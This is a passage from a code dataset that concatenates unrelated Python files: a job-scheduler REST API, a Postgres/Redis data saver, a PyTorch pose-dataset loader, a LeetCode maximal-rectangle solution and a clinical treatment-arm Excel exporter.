\"time_range\" : None if len(run.times) == 0 else [\n time_to_jso(min(run.times.values())),\n time_to_jso(max(run.times.values())),\n ],\n \"actions\" : actions,\n \"rerun\" : run.rerun,\n \"expected\" : run.expected,\n \"output_url\" : app.url_for(\"v1.run_output_meta\", run_id=run.run_id),\n \"labels\" : run.meta.get(\"labels\", []),\n }\n return jso\n\n\ndef run_to_jso(app, run, summary=False):\n if run.state is None:\n # This run is being deleted.\n # FIXME: Hack.\n return {\"run_id\": run.run_id, \"state\": None}\n\n jso = _run_summary_to_jso(app, run)\n\n if not summary:\n jso.update({\n \"conds\":\n [] if run.conds is None \n else [ _to_jso(c) for c in run.conds ],\n \"program\": None if run.program is None else run.program.to_jso(),\n # FIXME: Rename to metadata.\n \"meta\": run.meta,\n })\n\n return jso\n\n\ndef runs_to_jso(app, when, runs, summary=False):\n return {\n \"when\": time_to_jso(when),\n \"runs\": { r.run_id: run_to_jso(app, r, summary) for r in runs },\n }\n\n\ndef _output_metadata_to_jso(app, run_id, outputs):\n return [\n {\n \"output_id\": output_id,\n \"output_url\": app.url_for(\n \"v1.run_output\", run_id=run_id, output_id=output_id),\n \"output_len\": output.length,\n }\n for output_id, output in outputs.items()\n ]\n\n\n#-------------------------------------------------------------------------------\n# Jobs\n\nclass JobLookupError(LookupError):\n pass\n\n\n@API.exception(JobLookupError)\ndef job_lookup_error(request, exception):\n return error(exception, status=400)\n\n\nclass AmbiguousJobError(ValueError):\n pass\n\n\n@API.exception(AmbiguousJobError)\ndef ambiguous_job_error(request, exception):\n return error(exception, status=400)\n\n\ndef match(choices, target):\n \"\"\"\n Matches `target` to one of `choices`.\n\n Splits the target and each choice into words. Selects a choice such that\n each word in the target appears as a word in the choice, at least as a\n prefix.\n\n :return:\n The matching choice.\n \"\"\"\n REGEX = re.compile(r\"[^A-Za-z0-9]\")\n\n def words(target):\n return set(REGEX.split(target))\n\n target_words = words(target)\n\n def match(choice):\n choice_words = words(choice)\n return all(\n any( cw.startswith(sw) for cw in choice_words )\n for sw in target_words\n )\n\n choices = { c for c in choices if match(c) }\n\n if len(choices) == 0:\n raise JobLookupError(\"no job id match: \" + target)\n elif len(choices) == 1:\n return next(iter(choices))\n else:\n if len(choices) > 8:\n choices = \", \".join(list(choices)[: 8]) + \" …\"\n else:\n choices = \", \".join(choices)\n raise AmbiguousJobError(\"ambiguous job id: \" + choices)\n\n\ndef match_job_id(jobs, job_id):\n \"\"\"\n Matches `job_id` as an exact or fuzzy match.\n \"\"\"\n logging.info(f\"match_job_id {job_id}\")\n\n # Try for an exact match first.a\n try:\n jobs.get_job(job_id)\n except LookupError:\n pass\n else:\n return job_id\n\n # FIXME: Cache job ids (or word split job ids) to make this efficient.\n job_ids = [ j.job_id for j in jobs.get_jobs(ad_hoc=False) ]\n return match(job_ids, job_id)\n \n\n@API.route(\"/jobs/<job_id:path>\")\nasync def job(request, job_id):\n jobs = request.app.apsis.jobs\n try:\n job_id = match_job_id(jobs, unquote(job_id))\n except LookupError:\n return error(f\"no job_id {job_id}\", status=404)\n job = jobs.get_job(job_id)\n return response_json(job_to_jso(request.app, job))\n\n\n@API.route(\"/jobs/<job_id:path>/runs\")\nasync def job_runs(request, job_id):\n job_id = match_job_id(request.app.apsis.jobs, unquote(job_id))\n when, runs = request.app.apsis.run_store.query(job_id=job_id)\n jso = runs_to_jso(request.app, when, runs)\n return response_json(jso)\n\n\n@API.route(\"/jobs\")\nasync def jobs(request):\n \"\"\"\n Returns (non ad-hoc) jobs.\n \"\"\"\n jso = [ \n job_to_jso(request.app, j) \n for j in request.app.apsis.jobs.get_jobs(ad_hoc=False)\n ]\n return response_json(jso)\n\n\n#-------------------------------------------------------------------------------\n# Runs\n\n@API.route(\"/runs/<run_id>\", methods={\"GET\"})\nasync def run(request, run_id):\n try:\n when, run = request.app.apsis.run_store.get(run_id)\n except KeyError:\n return error(f\"unknown run {run_id}\", 404)\n \n jso = runs_to_jso(request.app, when, [run])\n return response_json(jso)\n\n\n@API.route(\"/runs/<run_id>/history\", methods={\"GET\"})\nasync def run_history(request, run_id):\n try:\n history = await request.app.apsis.get_run_history(run_id)\n except KeyError:\n return error(f\"unknown run {run_id}\", 404)\n\n return response_json({\n \"run_history\": [\n {\n \"run_id\" : r[\"run_id\"],\n \"timestamp\" : time_to_jso(r[\"timestamp\"]),\n \"message\" : r[\"message\"],\n }\n for r in history\n ]\n })\n\n\n@API.route(\"/runs/<run_id>/output\", methods={\"GET\"})\nasync def run_output_meta(request, run_id):\n try:\n outputs = request.app.apsis.outputs.get_metadata(run_id)\n except KeyError:\n return error(f\"unknown run {run_id}\", 404)\n\n jso = _output_metadata_to_jso(request.app, run_id, outputs)\n return response_json(jso)\n\n\n@API.route(\"/runs/<run_id>/output/<output_id>\", methods={\"GET\"})\nasync def run_output(request, run_id, output_id):\n try:\n data = request.app.apsis.outputs.get_data(run_id, output_id)\n except LookupError as exc:\n return error(exc, 404)\n else:\n return sanic.response.raw(data)\n\n\n@API.route(\"/runs/<run_id>/state\", methods={\"GET\"})\nasync def run_state_get(request, run_id):\n _, run = request.app.apsis.run_store.get(run_id)\n return response_json({\"state\": run.state})\n\n\n@API.route(\"/runs/<run_id>/cancel\", methods={\"POST\"})\nasync def run_cancel(request, run_id):\n state = request.app.apsis\n _, run = state.run_store.get(run_id)\n if run.state == run.STATE.scheduled:\n await state.cancel(run)\n return response_json({})\n else:\n return error(\"invalid run state for cancel\", 409, state=run.state)\n\n\n@API.route(\"/runs/<run_id>/start\", methods={\"POST\"})\nasync def run_start(request, run_id):\n state = request.app.apsis\n _, run = state.run_store.get(run_id)\n if run.state == run.STATE.scheduled:\n await state.start(run)\n return response_json({})\n else:\n return error(\"invalid run state for start\", 409, state=run.state)\n\n\n@API.route(\"/runs/<run_id>/rerun\", methods={\"POST\"})\nasync def run_rerun(request, run_id):\n state = request.app.apsis\n _, run = state.run_store.get(run_id)\n if run.state not in {run.STATE.failure, run.STATE.error, run.STATE.success}:\n return error(\"invalid run state for rerun\", 409, state=run.state)\n else:\n new_run = await state.rerun(run)\n jso = runs_to_jso(request.app, ora.now(), [new_run])\n # Let UIs know to show the new run.\n jso[\"show_run_id\"] = new_run.run_id\n return response_json(jso)\n\n\n# FIXME: PUT is probably right, but run actions currently are POST only.\n@API.route(\"/runs/<run_id>/signal/<signal>\", methods={\"PUT\", \"POST\"})\nasync def run_signal(request, run_id, signal):\n apsis = request.app.apsis\n _, run = apsis.run_store.get(run_id)\n\n if run.state not in {run.STATE.running}:\n return error(\"invalid run state for signal\", 409, state=run.state.name)\n assert run.program is not None\n\n apsis.run_history.info(run, f\"sending signal {signal}\")\n try:\n await run.program.signal(run.run_state, signal)\n except RuntimeError as exc:\n return error(str(exc), 400) # FIXME: code?\n return response_json({})\n\n\ndef _filter_runs(runs, args):\n \"\"\"\n Constructs a filter for runs from query args.\n \"\"\"\n try:\n run_id, = args[\"run_id\"]\n except KeyError:\n pass\n else:\n runs = ( r for r in runs if r.run_id == run_id )\n\n try:\n job_id, = args[\"job_id\"]\n except KeyError:\n pass\n else:\n runs = ( r for r in runs if r.inst.job_id == job_id )\n\n return runs\n\n\n@API.route(\"/runs\")\nasync def runs(request):\n apsis = request.app.apsis\n\n # Get runs from the selected interval.\n args = request.args\n summary, = args.pop(\"summary\", (\"False\", ))\n summary = to_bool(summary)\n run_ids = args.pop(\"run_id\", None)\n job_id, = args.pop(\"job_id\", (None, ))\n if job_id is not None:\n job_id = match_job_id(apsis.jobs, job_id)\n state, = args.pop(\"state\", (None, ))\n since, = args.pop(\"since\", (None, ))\n reruns, = args.pop(\"reruns\", (\"False\", ))\n\n when, runs = apsis.run_store.query(\n run_ids =run_ids, \n job_id =job_id,\n state =to_state(state),\n since =since, \n reruns =to_bool(reruns),\n )\n\n return response_json(runs_to_jso(request.app, when, runs, summary=summary))\n\n\n@API.websocket(\"/ws/runs\")\nasync def websocket_runs(request, ws):\n since, = request.args.pop(\"since\", (None, ))\n\n log.info(\"live runs connect\")\n with request.app.apsis.run_store.query_live(since=since) as queue:\n while True:\n # FIXME: If the socket closes, clean up instead of blocking until\n # the next run is available. Not sure how to do this. ws.ping()\n # with a timeout doesn't appear to work.\n next_runs = [await queue.get()]\n # Drain the queue.\n while True:\n try:\n next_runs.append(queue.get_nowait())\n except asyncio.QueueEmpty:\n break\n\n if any( r is None for r in next_runs ):\n # Signalled to shut down.\n await ws.close()\n break\n\n when = next_runs[-1][0]\n assert all( w <= when for w, _ in next_runs )\n runs = apsis.lib.itr.chain.from_iterable( r for _, r in next_runs )\n runs = _filter_runs(runs, request.args)\n\n # Break large sets into chunks, to avoid block for too long.\n chunks = list(apsis.lib.itr.chunks(runs, WS_RUN_CHUNK))\n if len(chunks) == 0:\n continue\n\n try:\n for chunk in chunks:\n with Timer() as timer:\n jso = runs_to_jso(request.app, when, chunk, summary=True)\n # FIXME: JSOs are cached but ujson.dumps() still takes real\n # time.\n json = ujson.dumps(jso)\n log.debug(f\"sending {len(chunk)} runs, {len(json)} bytes {timer.elapsed:.3f} s: {request.socket}\")\n await ws.send(json)\n await asyncio.sleep(WS_RUN_CHUNK_SLEEP)\n except websockets.ConnectionClosed:\n break\n\n log.info(\"live runs disconnect\")\n\n\n@API.route(\"/runs\", methods={\"POST\"})\nasync def run_post(request):\n apsis = request.app.apsis\n\n # The run may either contain a job ID, or a complete job.\n jso = request.json\n if \"job\" in jso:\n # A complete job.\n job = jso_to_job(jso[\"job\"], None)\n job.ad_hoc = True\n request.app.apsis.jobs.add(job)\n job_id = job.job_id\n\n elif \"job_id\" in jso:\n # Just a job ID.\n job_id = match_job_id(apsis.jobs, jso[\"job_id\"])\n\n else:\n return error(\"missing job_id or job\")\n\n run = Run(Instance(job_id, jso.get(\"args\", {})))\n request.app.apsis._validate_run(run)\n\n time = jso.get(\"times\", {}).get(\"schedule\", \"now\")\n time = None if time == \"now\" else ora.Time(time)\n await apsis.schedule(time, run)\n jso = runs_to_jso(request.app, ora.now(), [run])\n return response_json(jso)\n \n\n# FIXME: Is there a need for this?\n@API.route(\"/runs/reschedule/<job_id:path>\", methods={\"POST\"})\nasync def runs_reschedule_post(request, job_id):\n await reschedule_runs(request.app.apsis, job_id)\n return response_json({})\n\n\n","sub_path":"python/apsis/service/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":15259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"585100361","text":"import datetime\nimport psycopg2\nimport json\nfrom django.conf import settings\nfrom os.path import basename\nimport redis\n\n\nclass DataFile(object):\n\n def save_to_database(self, project_id, vendor, network, file_type, description, filename, task_id):\n r = redis.StrictRedis(host=settings.REDIS, port=6379, db=0)\n conn = psycopg2.connect(\n 'host = %s dbname = %s user = %s password = %s' % (\n settings.DATABASES['default']['HOST'],\n settings.DATABASES['default']['NAME'],\n settings.DATABASES['default']['USER'],\n settings.DATABASES['default']['PASSWORD']))\n cursor = conn.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS Universal3g3gNeighbors (\n filename TEXT,\n rncSource TEXT,\n utrancellSource TEXT,\n carrierSource TEXT,\n rncTarget TEXT,\n utrancellTarget TEXT,\n carrierTarget TEXT\n )''')\n cursor.execute('CREATE TABLE IF NOT EXISTS data_table (id SERIAL, project_id INT, filename TEXT, table_name TEXT, row JSONB)')\n cursor.execute('DELETE FROM data_table WHERE (project_id=%s) AND (filename=%s)', (project_id, basename(self.filename)))\n s = len(self.data)\n i = 0\n file_tables = set()\n for row in self.data:\n table_name = row.get('data_type')\n file_tables.add(row.get('data_type'))\n del row['data_type']\n cursor.execute('INSERT INTO data_table (project_id, filename, table_name, row) VALUES (%s, %s, %s, %s)', (project_id, filename, table_name, json.dumps(row, encoding='latin1')))\n i += 1\n r.set(task_id, '%s, writing' % int(float(i) / float(s) * 100))\n\n r.set(task_id, '100, writing')\n file_tables = list(file_tables)\n file_tables.sort()\n cursor = conn.cursor()\n cursor.execute('DELETE FROM files_files WHERE (project_id=%s) AND (filename=%s)', (project_id, basename(self.filename)))\n cursor.execute('INSERT INTO files_files (filename, date, tables, excel_filename, archive, file_type, description, vendor, network, project_id) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)', (\n filename,\n datetime.datetime.now(),\n ','.join(file_tables),\n '',\n '',\n file_type,\n description,\n vendor,\n network,\n project_id))\n conn.commit()\n r.set(task_id, 'done')","sub_path":"files/data_file.py","file_name":"data_file.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"357916803","text":"\n\n#calss header\nclass _MILDEW():\n\tdef __init__(self,): \n\t\tself.name = \"MILDEW\"\n\t\tself.definitions = [u'a black, green, or whitish area caused by a fungus that grows on things such as plants, paper, cloth, or buildings, usually if the conditions are warm and wet: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_mildew.py","file_name":"_mildew.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"17590539","text":"\"\"\"\n real-time joints definition: \n (0-'nose'\t1-'neck' 2-'right_shoulder' 3-'right_elbow' 4-'right_wrist'\n 5-'left_shoulder' 6-'left_elbow'\t 7-'left_wrist' 8-'right_hip'\n 9-'right_knee'\t 10-'right_ankle'\t11-'left_hip' 12-'left_knee'\n 13-'left_ankle'\t 14-'right_eye'\t 15-'left_eye' 16-'right_ear'\n 17-'left_ear' )\n \n\"\"\"\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader, Dataset\n\n# from PIL import Image\n# from PIL import ImageDraw\nimport cv2\nimport os\nimport numpy as np\nimport json\n\nimport util\n\nclass ClothesDataset(Dataset):\n def __init__(self, opt):\n super(ClothesDataset,self).__init__()\n self.opt = opt\n self.root = opt.root # data root\n self.mode = opt.mode # train or test\n self.path = self.root \n self.datalist = opt.datalist # pair data\n self.w = opt.w # 192\n self.h = opt.h # 288\n self.radius = opt.radius # 3\n \n self.transform = transforms.Compose([\n # transforms.Resize((self.h, self.w)),\n transforms.ToTensor(), # [0, 255]->[0.0, 1.0]\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]) # [0.0, 1.0]->[-1.0, 1.0]\n\n human1_names = []\n human2_names = []\n c_names = []\n \n # Load data into human1, human2, clothing names from path\n with open(os.path.join(self.path, self.datalist), \"r\") as f:\n for line in f.readlines():\n line = line.strip(\"\\n\")\n c_names.append(line)\n human1_names.append(line.replace(\".jpg\", \"_0.jpg\"))\n human2_names.append(line.replace(\".jpg\", \"_1.jpg\"))\n\n self.c_names = c_names\n self.human1_names = human1_names\n self.human2_names = human2_names\n\n def __len__(self):\n return len(self.c_names)\n \n def transform_keypoints(self, pose_label):\n # body parts*(x, y, probability)\n pose_data = np.zeros((18, 3))\n for part in pose_label:\n body = int(part[-1])\n if pose_data[body, 2] < part[2]:\n pose_data[body, 0] = part[0]\n pose_data[body, 1] = part[1]\n pose_data[body, 2] = part[2]\n \n return pose_data\n \n def transform_pose(self, human_pose):\n # r = self.radius\n sigma = self.radius\n point_num = human_pose.shape[0]\n # pose_map = torch.zeros(point_num, self.h, self.w)\n # pose_img = Image.new('L', (self.w, self.h))\n # pose_draw = ImageDraw.Draw(pose_img)\n pose_map = np.zeros((point_num, self.h, self.w))\n for i in range(point_num):\n # one_map = Image.new('L',(self.w, self.h))\n # draw = ImageDraw.Draw(one_map)\n px = human_pose[i, 0]\n py = human_pose[i, 1]\n if px > 1 and py > 1:\n one_heatmap = util.makeGaussian([self.h, self.w], sigma, [px, py])\n pose_map[i] = one_heatmap\n pose_map = torch.from_numpy(pose_map) # [0,1]\n\n # pose_img = np.array(pose_img)/255\n # pose_img = torch.from_numpy((pose_img-0.5)*2)\n return pose_map\n \n def __getitem__(self, index):\n # Load human 1,2 and clothing\n h1_name = self.human1_names[index]\n h2_name = self.human2_names[index]\n c_name = self.c_names[index]\n\n # c = Image.open(os.path.join(self.path, \"clothes\", c_name)).convert('RGB')\n c = cv2.imread(os.path.join(self.path, \"clothes\", c_name)) # B,G,R order\n c = self.transform(c)/2\n\n h1 = cv2.imread(os.path.join(self.path, \"human\", h1_name))\n h1 = self.transform(h1)/2\n h2 = cv2.imread(os.path.join(self.path, \"human\", h2_name))\n h2 = self.transform(h2)/2\n\n # # Load human pose points from json files\n human1_pose_name = h1_name.replace('.jpg', '_keypoints.json')\n with open(os.path.join(self.path, \"human_pose\", human1_pose_name), \"r\") as f:\n pose_label = json.load(f)\n human1_pose = self.transform_keypoints(pose_label)\n human1_pose_map = self.transform_pose(human1_pose)\n human1_pose = torch.from_numpy(human1_pose)\n\n human2_pose_name = h2_name.replace('.jpg', '_keypoints.json')\n with open(os.path.join(self.path, \"human_pose\", human2_pose_name), \"r\") as f:\n pose_label = json.load(f)\n human2_pose = self.transform_keypoints(pose_label)\n human2_pose_map = self.transform_pose(human2_pose)\n human2_pose = torch.from_numpy(human2_pose)\n \n result = {\n \"human1_name\": h1_name,\n \"human2_name\": h2_name,\n \"c_name\": c_name,\n \"clothes\": c,\n \"human1\": h1,\n \"human2\": h2,\n \"human1_pose\": human1_pose,\n \"human2_pose\": human2_pose,\n \"human1_pose_map\": human1_pose_map,\n \"human2_pose_map\": human2_pose_map,\n }\n \n return result\n\nif __name__ == \"__main__\":\n \n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--root\", default=\"../data\")\n parser.add_argument(\"--mode\", default=\"try\")\n parser.add_argument(\"--datalist\", default=\"all_files.txt\")\n parser.add_argument(\"--radius\", default=8)\n parser.add_argument(\"--w\", default=192)\n parser.add_argument(\"--h\", default=288)\n parser.add_argument(\"--batch_size\", default=2)\n parser.add_argument(\"--parse_channel\", default=20)\n opt = parser.parse_args()\n \n dataset = ClothesDataset(opt)\n # dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=True, pin_memory=True)\n dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=True)\n print('Size of the dataset: %d, dataloader: %d' %(len(dataset), len(dataloader)))\n # item = dataset.__getitem__(0)\n\n data_iter = iter(dataloader)\n batch = data_iter.next()\n\n c = batch['clothes']\n h1 = batch['human1']\n h2 = batch['human2']\n h1_p = batch['human1_pose']\n h2_p = batch['human2_pose']\n h1_pm = batch['human1_pose_map']\n h2_pm = batch['human2_pose_map']\n","sub_path":"ClothesDataset.py","file_name":"ClothesDataset.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"15255067","text":"#\n# @lc app=leetcode id=85 lang=python3\n#\n# [85] Maximal Rectangle\n#\n# https://leetcode.com/problems/maximal-rectangle/description/\n#\n# algorithms\n# Hard (32.58%)\n# Total Accepted: 114.8K\n# Total Submissions: 351.3K\n# Testcase Example: '[[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]]'\n#\n# Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle\n# containing only 1's and return its area.\n# \n# Example:\n# \n# \n# Input:\n# [\n# ⁠ [\"1\",\"0\",\"1\",\"0\",\"0\"],\n# ⁠ [\"1\",\"0\",\"1\",\"1\",\"1\"],\n# ⁠ [\"1\",\"1\",\"1\",\"1\",\"1\"],\n# ⁠ [\"1\",\"0\",\"0\",\"1\",\"0\"]\n# ]\n# Output: 6\n# \n# \n#\nclass Solution:\n # dp. \n # 优先考虑height。 在高度最大的情况下,计算可以容许的最大宽度,进而得到最大面积\n def maximalRectangle(self, matrix: List[List[str]]) -> int:\n m = len(matrix)\n if m == 0: return 0\n n = len(matrix[0])\n max_area = 0\n height = [0]*n\n left = [0]*n # left, right [l, r)\n right = [n]*n\n for i in range(m):\n curr_left, curr_right = 0, n\n # calculate the maximum height of the item so far\n for j in range(n):\n if matrix[i][j] == \"1\":\n height[j] += 1\n else:\n height[j] = 0\n for j in range(n):\n if matrix[i][j] == \"1\":\n left[j] = max(left[j], curr_left)\n else: # there's no left boundary, we just set it to zero\n # when mutiplied with the height[i][j], which is zero, the area is zero\n left[j] = 0\n curr_left = j+1\n for j in range(n-1, -1, -1):\n if matrix[i][j] == \"1\":\n right[j] = min(right[j], curr_right)\n else: # there's no right boundary, we just set it to n\n # when mutiplied with the height[i][j], which is zero, the area is zero\n right[j] = n\n curr_right = j\n # print(height, left, right)\n for j in range(n):\n max_area = max(max_area, height[j] * (right[j]-left[j]))\n \n return max_area\n\n","sub_path":"85.maximal-rectangle.py","file_name":"85.maximal-rectangle.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"300799892","text":"import copy\nimport logging\n\nfrom helpers.excel_generator import ExcelGenerator\n\nARM_OVERVIEW_BOLD_COLUMNS = [1, 3, 5, 7]\nARM_OVERVIEW_HEADING = \"ARM Data\"\n\nNONSTANDARD_PARSERS = {\n \"EAY131-A\": \"Eay131a\",\n \"EAY131-I\": \"Eay131i\",\n \"EAY131-IX1\": \"Eay131i\",\n \"EAY131-J\": \"Eay131j\",\n \"EAY131-K1\": \"Eay131k1\",\n \"EAY131-K2\": \"Eay131k2\",\n \"EAY131-L\": \"Eay131l\",\n \"EAY131-M\": \"Eay131m\",\n \"EAY131-N\": \"Eay131n\",\n \"EAY131-P\": \"Eay131p\",\n \"EAY131-Y\": \"Eay131y\",\n \"EAY131-Z1C\": \"Eay131z1c\",\n \"EAY131-Z1E\": \"Eay131z1e\",\n \"EAY131-Z1F\": \"Eay131z1f\",\n \"EAY131-Z1G\": \"Eay131z1g\",\n \"EAY131-Z1H\": \"Eay131z1h\",\n \"EAY131-Z1I\": \"Eay131z1i\",\n}\n\nDISEASE_EXCLUSION_HEADING = \"Histologic Disease Exclusion Codes\"\nDISEASE_EXCLUSION_MAP = [\n ('CTEP CATEGORY', 'ctepCategory'),\n ('CTEP SUB-CATEGORY', 'ctepSubCategory'),\n ('CTEP TERM', 'ctepTerm'),\n ('SHORT NAME', 'shortName'),\n ('MEDDRA CODE', '_id'),\n]\nDISEASE_EXCL_COLUMN_NAMES = [map_item[0] for map_item in DISEASE_EXCLUSION_MAP]\nDISEASE_EXCL_FIELD_NAMES = [map_item[1] for map_item in DISEASE_EXCLUSION_MAP]\nDISEASE_EXCLUSION_SOURCE = 'exclusionDiseases'\n\nPRIOR_THERAPY_HEADING = \"Prior Therapy (Drug Exclusion)\"\nPRIOR_THERAPY_MAP = [\n ('Drug ID', 'drugId'),\n ('Drug Name', 'name'),\n ('Drug ID 2', 'drugId2'),\n ('Drug Name', 'name2'),\n ('Description (Free form text)', 'description'),\n ('Class (agreed upon list)', 'drugClass'),\n ('Pathway (agreed upon list)', 'pathway'),\n ('Target Gene (agreed upon list)', 'target'),\n]\nPRIOR_THERAPY_COLUMN_NAMES = [map_item[0] for map_item in PRIOR_THERAPY_MAP]\nPRIOR_THERAPY_FIELD_NAMES = [map_item[1] for map_item in PRIOR_THERAPY_MAP]\nPRIOR_THERAPY_SOURCE = 'exclusionDrugs'\n\nIHC_RESULTS_HEADING = \"IHC Results\"\nIHC_RESULTS_MAP = [\n ('Gene', 'gene'),\n ('Status (POSITIVE, NEGATIVE, INDETERMINATE)', 'assayResultStatus'),\n ('Variant (PRESENT, NEGATIVE, EMPTY)', 'assayVariant'),\n ('Description', 'description'),\n ('LOE', 'levelOfEvidence'),\n]\nIHC_RESULTS_COLUMN_NAMES = [map_item[0] for map_item in IHC_RESULTS_MAP]\nIHC_RESULTS_FIELD_NAMES = [map_item[1] for map_item in IHC_RESULTS_MAP]\nIHC_RESULTS_SOURCE = 'assayResults'\n\nINCL_NONHOTSPOT_RULES_HEADING = \"Inclusion Non-Hotspot Rules\"\nEXCL_NONHOTSPOT_RULES_HEADING = \"Exclusion Non-Hotspot Rules\"\nNONHOTSPOT_RULES_MAP = [\n ('Description', 'description'),\n ('Oncomine Variant Class', 'oncominevariantclass'),\n ('Gene Name', 'gene'),\n ('Exon', 'exon'),\n ('Function', 'function'),\n ('Level of Evidence', 'levelOfEvidence'),\n ('Literature Reference (Pubmed ID)', lambda var: \", \".join(var.get(\"publicMedIds\", []))), # is a list\n ('Special Rules', lambda var: \"TRUE\" if var.get('armSpecific', False) else \"\"),\n]\nNONHOTSPOT_RULES_COLUMN_NAMES = [map_item[0] for map_item in NONHOTSPOT_RULES_MAP]\nNONHOTSPOT_RULES_FIELD_NAMES = [map_item[1] for map_item in NONHOTSPOT_RULES_MAP]\n\nINCL_VARIANTS_HEADING = \"Inclusion Variants\"\nEXCL_VARIANTS_HEADING = \"Exclusion Variants\"\nVARIANTS_MAP = [\n ('Gene Name', 'geneName'),\n ('Variant ID', 'identifier'),\n ('Variant Type', 'type'),\n ('Variant Description', 'description'),\n ('Level of Evidence Code', 'levelOfEvidence'),\n ('Protein', 'protein'),\n ('Chromosome', 'chromosome'),\n ('Position', 'position'),\n ('Alt', 'alternative'),\n ('Ref', 'reference'),\n ('Literature Reference', lambda var: \", \".join(var.get(\"publicMedIds\", []))), # is a list\n ('Variant Source', lambda var: var.get(\"metadata\", {}).get(\"variantSource\", \"Subprotocol\")),\n ('Copy Number Threshold', lambda var: var.get(\"metadata\", {}).get(\"copyNumberThreshold\", \"\")),\n ('Special Rules', lambda var: \"TRUE\" if var.get('armSpecific', False) else \"\"),\n]\nVARIANTS_COLUMN_NAMES = [map_item[0] for map_item in VARIANTS_MAP]\nVARIANTS_FIELD_NAMES = [map_item[1] for map_item in VARIANTS_MAP]\n\n\ndef generate_treatment_arm_excel_file(treatment_arm_data):\n logging.debug(\"Generating Excel File for Treatment Arm {}\".format(treatment_arm_data['treatmentArmId']))\n\n eg = ExcelGenerator(treatment_arm_data['treatmentArmId'])\n\n add_sections_to_workbook(eg, treatment_arm_data)\n\n # returns the bytes to save as an Excel file\n return eg.get_workbook_data()\n\n\ndef add_sections_to_workbook(eg, treatment_arm_data):\n add_arm_overview_data(eg, treatment_arm_data)\n add_disease_exclusion_data(eg, treatment_arm_data)\n add_prior_therapy_data(eg, treatment_arm_data)\n add_ihc_results_data(eg, treatment_arm_data)\n add_variant_report_data(eg, treatment_arm_data)\n\n\ndef add_ihc_results_data(eg, treatment_arm_data):\n ihc_results_data = extract_data(treatment_arm_data, IHC_RESULTS_SOURCE, IHC_RESULTS_FIELD_NAMES)\n eg.add_section(ihc_results_data, column_names=IHC_RESULTS_COLUMN_NAMES,\n section_heading=IHC_RESULTS_HEADING, skip_rows=1)\n\n\ndef create_prior_therapy_data(exclusion_drug_data):\n drug_list = exclusion_drug_data.get('drugs', [])\n prior_therapy_data = copy.copy(drug_list[0]) if drug_list else {}\n if len(drug_list) > 1:\n prior_therapy_data['drugId2'] = drug_list[1].get('drugId', \"\")\n prior_therapy_data['name2'] = drug_list[1].get('name', \"\")\n return prior_therapy_data\n\n\ndef add_prior_therapy_data(eg, treatment_arm_data):\n prior_therapy_data = extract_data(treatment_arm_data, PRIOR_THERAPY_SOURCE, PRIOR_THERAPY_FIELD_NAMES,\n field_preprocessor=create_prior_therapy_data)\n eg.add_section(prior_therapy_data, column_names=PRIOR_THERAPY_COLUMN_NAMES,\n section_heading=PRIOR_THERAPY_HEADING, skip_rows=1)\n\n\ndef add_disease_exclusion_data(eg, treatment_arm_data):\n disease_exclusion_data = extract_data(treatment_arm_data, DISEASE_EXCLUSION_SOURCE, DISEASE_EXCL_FIELD_NAMES)\n eg.add_section(disease_exclusion_data, column_names=DISEASE_EXCL_COLUMN_NAMES,\n section_heading=DISEASE_EXCLUSION_HEADING, skip_rows=1)\n\n\ndef add_arm_overview_data(eg, treatment_arm_data):\n overview_data = extract_arm_overview_data(treatment_arm_data)\n eg.add_section(overview_data, bold_columns=ARM_OVERVIEW_BOLD_COLUMNS, section_heading=ARM_OVERVIEW_HEADING)\n\n\ndef extract_arm_overview_data(treatment_arm_data):\n\n treatment_arm_drug = treatment_arm_data.get(\"treatmentArmDrugs\", [{}])[0]\n treatment_arm_id = treatment_arm_data.get(\"treatmentArmId\", \"ARM ID MISSING!\")\n row1 = [\n \"Official Name\", treatment_arm_data.get(\"name\", \"ARM NAME MISSING!\"),\n \"ARM Id\", treatment_arm_id,\n \"ARM Drug\", treatment_arm_drug.get(\"name\", \"DRUG NAME MISSING!\"),\n \"Version\", treatment_arm_data.get(\"version\", \"VERSION MISSING!\"),\n ]\n row2 = [\n \"ARM Pathway Id\", \"\",\n \"ARM Pathway Name\", treatment_arm_drug.get(\"pathway\", \"\"),\n \"ARM Drug Id\", treatment_arm_drug.get(\"drugId\", \"DRUG ID MISSING!\"),\n \"Study Types\", ', '.join(treatment_arm_data.get(\"studyTypes\", [\"STUDY TYPES MISSING!\"])),\n ]\n row3 = [\n \"ARM Gene\", treatment_arm_data.get(\"gene\", \"\"),\n \"ARM Description\", treatment_arm_data.get(\"description\", \"ARM DESCRIPTION MISSING!\"),\n \"ARM Parser\", NONSTANDARD_PARSERS.get(treatment_arm_id, \"StandardParser\")\n ]\n return [row1, row2, row3]\n\n\ndef extract_data(treatment_arm_data, source, field_names, field_preprocessor=None):\n def get_field(var, field):\n if callable(field):\n return field(var)\n else:\n field_data = var.get(field, \"\")\n return field_data\n\n rows = []\n for field_object in treatment_arm_data.get(source, []):\n if field_preprocessor is not 